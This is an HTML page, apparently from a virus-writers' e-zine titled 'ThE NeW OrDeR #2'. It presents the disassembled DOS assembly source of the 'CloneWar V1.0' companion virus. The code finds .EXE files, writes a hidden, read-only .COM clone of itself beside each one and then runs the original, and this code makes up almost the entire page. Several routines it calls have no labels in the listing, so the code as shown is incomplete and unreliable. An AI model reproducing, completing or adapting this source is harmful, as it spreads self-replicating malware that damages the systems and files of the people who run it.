<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>CLONEWAR</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>CSEG SEGMENT<br>
ASSUME CS:CSEG,DS:NOTHING<br>
<br>
ORG 100H<br>
<br>
START: JMP MY_BEGIN<br>
<br>
DB &quot;CloneWar V1.0 &quot;<br>
wild DB &quot;*.EXE&quot;,0<br>
file_Ext DB &quot;COM&quot;,0<br>
file_found DB 12 DUP(' '), 0<br>
file_create DB 12 DUP(' '), 0<br>
search_attrib DW 17H<br>
num_infect dw 0<br>
<br>
my_cmd:<br>
Cmd_len db 13<br>
file_clone db 12 DUP (' '), 0<br>
<br>
ASSUME CS:CSEG, DS:CSEG, ES:NOTHING<br>
<br>
cld<br>
mov di,OFFSET file_clone<br>
mov al,0<br>
mov cx,12<br>
repne scasb<br>
<br>
mov al,0Dh<br>
stosb<br>
mov ax,12<br>
sub ax,cx<br>
mov cmd_len, al<br>
ret<br>
<br>
<br>
MOV DI,OFFSET file_found<br>
MOV SI,158<br>
MOV CX,12<br>
REP MOVSB<br>
<br>
MOV DI,OFFSET file_create<br>
MOV SI,158<br>
MOV CX,12<br>
REP MOVSB<br>
<br>
cld<br>
mov di,OFFSET file_create<br>
mov al,'.'<br>
mov cx,9<br>
repne scasb<br>
<br>
mov si,OFFSET file_ext<br>
mov cx,3<br>
rep movsb<br>
<br>
ret<br>
<br>
Check_file:<br>
mov dx,OFFSET file_create<br>
mov cx,0<br>
mov ax,3d00h<br>
int 21h<br>
<br>
Chk_done:<br>
ret<br>
<br>
mov dx,OFFSET file_create<br>
mov cx,0<br>
mov ah,3ch<br>
int 21h<br>
jc EXIT<br>
<br>
mov bx,ax<br>
mov cx,(OFFSET END_OF_CODE - OFFSET START)<br>
mov dx,OFFSET START<br>
mov ah,40h<br>
int 21h<br>
<br>
;Close file<br>
mov ah,3eh<br>
int 21h<br>
<br>
mov dx,OFFSET file_create<br>
mov cx,3 ;(1) read only, (2) hidden, (4) system<br>
mov ax,4301h<br>
int 21h<br>
<br>
ret<br>
<br>
MY_BEGIN:<br>
mov sp,offset STACK_HERE<br>
mov bx,sp<br>
add bx,15<br>
mov cl,4<br>
shr bx,cl<br>
mov ah,4ah<br>
int 21h<br>
<br>
MOV DI,OFFSET file_clone<br>
MOV SI,OFFSET file_found<br>
MOV CX,12<br>
REP MOVSB<br>
<br>
READ_DIR: MOV DX,OFFSET wild<br>
MOV CX,search_attrib<br>
<br>
MOV AH,4EH<br>
INT 21H<br>
<br>
JC EXIT<br>
<br>
Do_file:<br>
call Store_name<br>
<br>
call Check_file<br>
jnc seek_another<br>
call Infect_file<br>
jmp Exit<br>
<br>
seek_another:<br>
<br>
find_next:<br>
mov ah,4fh<br>
int 21h<br>
jmp Do_file<br>
<br>
EXIT:<br>
<br>
call Prepare_command<br>
mov si, OFFSET my_cmd<br>
int 2Eh <br>
MOV AX,4C00H<br>
INT 21H<br>
<br>
END_OF_CODE = $<br>
<br>
STACK_HERE EQU END_OF_CODE + 512<br>
<br>
CSEG ENDS<br>
END START</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
